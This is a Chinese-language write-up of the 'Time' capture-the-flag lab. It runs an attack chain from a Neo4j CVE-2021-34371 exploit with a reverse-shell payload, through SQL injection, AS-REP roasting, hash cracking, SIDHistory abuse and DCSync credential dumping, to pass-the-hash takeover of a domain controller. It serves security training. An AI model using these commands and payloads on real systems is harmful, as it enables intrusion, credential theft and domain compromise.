春秋云镜-Time

Neo4j CVE-2021-34371，sql 注入，AS-REP Roasting，SIDHistory，哈希传递

信息收集

fscan

D:\aWeb\fscan-main>.\fscan.exe -h 39.99.151.46 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.99.151.46:22 open
39.99.151.46:1337 open
39.99.151.46:7474 open
39.99.151.46:7473 open
39.99.151.46:7687 open
39.99.151.46:39433 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://39.99.151.46:7474  code:303 len:0      title:None 跳转url: http://39.99.151.46:7474/browser/
[*] WebTitle http://39.99.151.46:7474/browser/ code:200 len:3279   title:Neo4j Browser
[*] WebTitle https://39.99.151.46:7687 code:400 len:50     title:None
[*] WebTitle https://39.99.151.46:7473 code:303 len:0      title:None 跳转url: https://39.99.151.46:7473/browser/
[*] WebTitle https://39.99.151.46:7473/browser/ code:200 len:3279   title:Neo4j Browser
已完成 6/6
[*] 扫描结束,耗时: 5m37.2643762s

Neo4j 使用 CVE-2021-34371 获取 shell

发现有 Neo4j 服务，尝试打 CVE，CVE-2021-34371，下载 CVE-2021-34371，CVE 复现 CVE-2021-34371 Neo4j-Shell 漏洞复现

执行 mvn install 生成的 exp 文件 rhino_gadget-1.0-SNAPSHOT-fatjar.jar

java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://39.99.151.46:1337 "bash -c {echo,base64-encode(bash -i >& /dev/tcp/IP/1234 0>&1)}|{base64,-d}|{bash,-i}"

在 /home/neo4j 目录下拿到 flag

flag01: flag{cbedf03d-2fa2-41cd-aad8-7cbe1dc6b035}

对后台系统 sql 注入 dump 数据

发现本机 IP 为 172.22.6.36

wget 上传 fscan 收集内网信息

./FScan_2.0.1_linux_x64 -h 172.22.6.36/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.8s]     已选择服务扫描模式
[1.8s]     开始信息扫描
[1.8s]     CIDR范围: 172.22.6.0-172.22.6.255
[1.8s]     generate_ip_range_full
[1.8s]     解析CIDR 172.22.6.36/24 -> IP范围 172.22.6.0-172.22.6.255
[1.8s]     最终有效主机数量: 256
[1.8s]     开始主机扫描
[1.8s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s]     正在尝试无监听ICMP探测...
[1.8s]     ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
[1.8s]     当前用户权限不足,无法发送ICMP包
[1.8s]     切换为PING方式探测...
[1.9s] [*] 目标 172.22.6.12     存活 (ICMP)
[4.9s] [*] 目标 172.22.6.25     存活 (ICMP)
[4.9s] [*] 目标 172.22.6.36     存活 (ICMP)
[5.0s] [*] 目标 172.22.6.38     存活 (ICMP)
[7.9s]     存活主机数量: 4
[7.9s]     有效端口数量: 233
[7.9s] [*] 端口开放 172.22.6.36:22
[7.9s] [*] 端口开放 172.22.6.12:445
[7.9s] [*] 端口开放 172.22.6.12:139
[7.9s] [*] 端口开放 172.22.6.12:389
[7.9s] [*] 端口开放 172.22.6.12:135
[7.9s] [*] 端口开放 172.22.6.12:88
[7.9s] [*] 端口开放 172.22.6.36:7687
[7.9s] [*] 端口开放 172.22.6.25:445
[7.9s] [*] 端口开放 172.22.6.25:139
[7.9s] [*] 端口开放 172.22.6.25:135
[7.9s] [*] 端口开放 172.22.6.38:22
[7.9s] [*] 端口开放 172.22.6.38:80
[10.9s]     扫描完成, 发现 12 个开放端口
[10.9s]     存活端口数量: 12
[10.9s]     开始漏洞扫描
[11.1s]     POC加载完成: 总共387个，成功387个，失败0个
[11.1s] [*] NetInfo 扫描结果
目标主机: 172.22.6.12
主机名: DC-PROGAME
发现的网络接口:
   IPv4地址:
      └─ 172.22.6.12
[11.1s] [*] NetInfo 扫描结果
目标主机: 172.22.6.25
主机名: WIN2019
发现的网络接口:
   IPv4地址:
      └─ 172.22.6.25
[11.1s] [*] 网站标题 http://172.22.6.38        状态码:200 长度:1531   标题:后台登录
[11.1s] [+] NetBios 172.22.6.25     XIAORANG\WIN2019              
[11.2s] [+] NetBios 172.22.6.12     DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
[11.2s]     系统信息 172.22.6.12 [Windows Server 2016 Datacenter 14393]
[11.4s] [*] 网站标题 https://172.22.6.36:7687  状态码:400 长度:50     标题:无标题
[55.6s]     扫描已完成: 22/22

得到以下信息

172.22.6.12     DC:DC-PROGAME.xiaorang.lab  
172.22.6.25     XIAORANG\WIN2019   
172.22.6.36     本机
172.22.6.38		web 服务

先看看 172.22.6.38 主机，后台系统，存在 sql 注入

直接使用 sqlmap 可以把数据 dump 下来

proxychains sqlmap -u http://172.22.6.38/index.php -data "username=admin&password=1" --dump --batch

拿到很多数据包括 administrator 密码

Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password         | username      |
+----+------------------+---------------+
| 1  | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+

Database: oa_db
Table: oa_f1Agggg
[1 entry]
+----+--------------------------------------------+
| id | flag02                                     |
+----+--------------------------------------------+
| 1  | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+

flag02：flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}

oa 用户名进行 AS-REP Roasting 攻击

拿到一些 oa 用户数据

用户名尝试 AS-REP Roasting 攻击

proxychains -q impacket-GetNPUsers -dc-ip 172.22.6.12  xiaorang.lab/ -usersfile usernames.txt

最后拿到两个用户的 TGT 票据

$krb5asrep$23$wenshao@XIAORANG.LAB:c8a8e9c4178ec417e26b8ebc6e550150$c39230f158eb73a400f9fafae5cccb38154e920c2f2375ad3d1cd7964b99a92e20b650ad24cfbdfbd2cbccbaa6b8c8ee2574f07fb5361f93846c31c4197ffe1ab4aaecf3d2df6f873f354fd9470f99ac93000c0cde54d7139f0a2048c37e9ea5398ac19ac5df758cdd58345197a82ba12add01a054ef8c9c7bc758c6716753377d7c6aeddd1d4469ccf3cfcea07aced971387583ac5c52087f17c88393b36ef6248aeb0aa3779fe3c6399fc6fd9288cc3bef37026a10675a2fe9d77d06353fbe855d6597b86f45b69822d8b143f4008c0e850a841dc22b86c4fe9a8b4d9f4d9b205bb21c0ff181c9630def6f

$krb5asrep$23$zhangxin@XIAORANG.LAB:e66688646b49b157283973d305a76af7$aa9857d93ea5008534e9c35ba1402f31035cb17212958c78901039b65e31fe252197019c51623bd8d234c47475df303fdd197c157ac641afa8a7ef312c7ba6ebc63b56abce6ed1dc5a7b8f8cb1d8d1be7c64cf049e88210d06540aed6c1de37c4e0e6071ae9f6ba36c19c5791ea38304fd581b93f07cc8d12d00118488afa1798a96ba3c06378cf463dce86eec953c1e51704434eb3f6afc1e826273862f7b6be99a6c8e058efe74425a3a524659bcf8a1741091c8b4c3a83de577b1a9a20fac2ff327901128ea8e6552a59dd49880777927b79d81d7bcf67a423666a286016abd7dd09d8147ddd6581d64ce

hashcat 爆破

hashcat -m 18200 '$TGT$' /usr/share/wordlists/rockyou.txt --force

拿到两个密文

wenshao@XIAORANG.LAB:hellokitty
zhangxin@XIAORANG.LAB:strawberry

测试发现两个用户都能登录到 172.22.6.25 这台机器

└─# proxychains -q nxc rdp 172.22.6.0/24 -u 'wenshao' -p 'hellokitty'
RDP         172.22.6.12     3389   DC-PROGAME       [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.25     3389   WIN2019          [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.12     3389   DC-PROGAME       [+] xiaorang.lab\wenshao:hellokitty
RDP         172.22.6.25     3389   WIN2019          [+] xiaorang.lab\wenshao:hellokitty (Pwn3d!)

└─# proxychains -q nxc rdp 172.22.6.0/24 -u 'zhangxin' -p 'strawberry'
RDP         172.22.6.12     3389   DC-PROGAME       [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.12     3389   DC-PROGAME       [+] xiaorang.lab\zhangxin:strawberry
RDP         172.22.6.25     3389   WIN2019          [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.25     3389   WIN2019          [+] xiaorang.lab\zhangxin:strawberry (Pwn3d!)

那么使用这两个有效用户收集域信息进行分析

proxychains bloodhound-python -u wenshao -p hellokitty -d xiaorang.lab -c all -ns 172.22.6.12 --zip --dns-tcp

SIDHistory 滥用

分析域信息发现有一个有 SIDHistory 属性的 yuxuan 用户

在 help 中可以找到一些信息

The user YUXUAN@XIAORANG.LAB has, in its SIDHistory attribute, the SID for the user ADMINISTRATOR@XIAORANG.LAB.

When a kerberos ticket is created for YUXUAN@XIAORANG.LAB, it will include the SID for ADMINISTRATOR@XIAORANG.LAB, and therefore grantYUXUAN@XIAORANG.LAB the same privileges and permissions asADMINISTRATOR@XIAORANG.LAB.

因此现在可以知道 yuxuan 用户和 Administrator 具有一样的权限，属于域管，那么只要拿下 yuxuan 用户就行了

用豌豆荚收集信息，拿到 yuxuan 用户密码

DefaultDomainName             :  xiaorang.lab
    DefaultUserName               :  yuxuan
     [0m [1;31mDefaultPassword               :  Yuxuan7QbrgZ3L

minikatz 抓 hash

lsadump::dcsync /domain:xiaorang.lab /all /csv

拿到一些敏感 hash

502     krbtgt  a4206b127773884e2c7ea86cdd282d9c        514
500     Administrator   04d93ffd6f5f6e4490e0de23f240a5e9        512
1000    DC-PROGAME$     a61d66fb5891854474ab0651c51bcad8        532480
1181    WIN2019$        231bed49e676f7ec4f3cfa9790d755c8        4096

利用哈希传递拿到权限

测试发现 DC 和 WIN2019 都能 Pwn 掉

└─# proxychains -q crackmapexec smb 172.22.6.0/25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab
SMB         172.22.6.12     445    DC-PROGAME       [*] Windows Server 2016 Datacenter 14393 x64 (name:DC-PROGAME) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
SMB         172.22.6.25     445    WIN2019          [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN2019) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB         172.22.6.12     445    DC-PROGAME       [+] xiaorang.lab\administrator:04d93ffd6f5f6e4490e0de23f240a5e9 (Pwn3d!)
SMB         172.22.6.25     445    WIN2019          [+] xiaorang.lab\administrator:04d93ffd6f5f6e4490e0de23f240a5e9 (Pwn3d!)

拿到 flag3

└─# proxychains -q crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -X "type Users\Administrator\flag\flag03.txt"
SMB         172.22.6.25     445    WIN2019          [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN2019) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB         172.22.6.25     445    WIN2019          [+] xiaorang.lab\administrator:04d93ffd6f5f6e4490e0de23f240a5e9 (Pwn3d!)
SMB         172.22.6.25     445    WIN2019          [+] Executed command
SMB         172.22.6.25     445    WIN2019          flag03: flag{80ce92a5-c074-4f20-946d-14706d5c3492}
SMB         172.22.6.25     445    WIN2019
SMB         172.22.6.25     445    WIN2019
SMB         172.22.6.25     445    WIN2019          Maybe you can find something interesting on this server.
SMB         172.22.6.25     445    WIN2019          =======================================
SMB         172.22.6.25     445    WIN2019          What you may not know is that many objects in this domain
SMB         172.22.6.25     445    WIN2019          are moved from other domains.

同样也能拿到 flag4

└─# proxychains -q crackmapexec smb 172.22.6.12 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -X "type Users\Administrator\flag\flag04.txt"
SMB         172.22.6.12     445    DC-PROGAME       [*] Windows Server 2016 Datacenter 14393 x64 (name:DC-PROGAME) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
SMB         172.22.6.12     445    DC-PROGAME       [+] xiaorang.lab\administrator:04d93ffd6f5f6e4490e0de23f240a5e9 (Pwn3d!)
SMB         172.22.6.12     445    DC-PROGAME       [+] Executed command
SMB         172.22.6.12     445    DC-PROGAME       Awesome! you got the final flag.
SMB         172.22.6.12     445    DC-PROGAME
SMB         172.22.6.12     445    DC-PROGAME       ::::::::::::::::::::::::::    :::: ::::::::::
SMB         172.22.6.12     445    DC-PROGAME       :+:        :+:    +:+:+: :+:+:+:+:
SMB         172.22.6.12     445    DC-PROGAME       +:+        +:+    +:+ +:+:+ +:++:+
SMB         172.22.6.12     445    DC-PROGAME       +#+        +#+    +#+  +:+  +#++#++:++#
SMB         172.22.6.12     445    DC-PROGAME       +#+        +#+    +#+       +#++#+
SMB         172.22.6.12     445    DC-PROGAME       #+#        #+#    #+#       #+##+#
SMB         172.22.6.12     445    DC-PROGAME       ###    ##############       #############
SMB         172.22.6.12     445    DC-PROGAME
SMB         172.22.6.12     445    DC-PROGAME
SMB         172.22.6.12     445    DC-PROGAME       flag04: flag{b3dd441d-8703-482f-aead-598fa800ade2}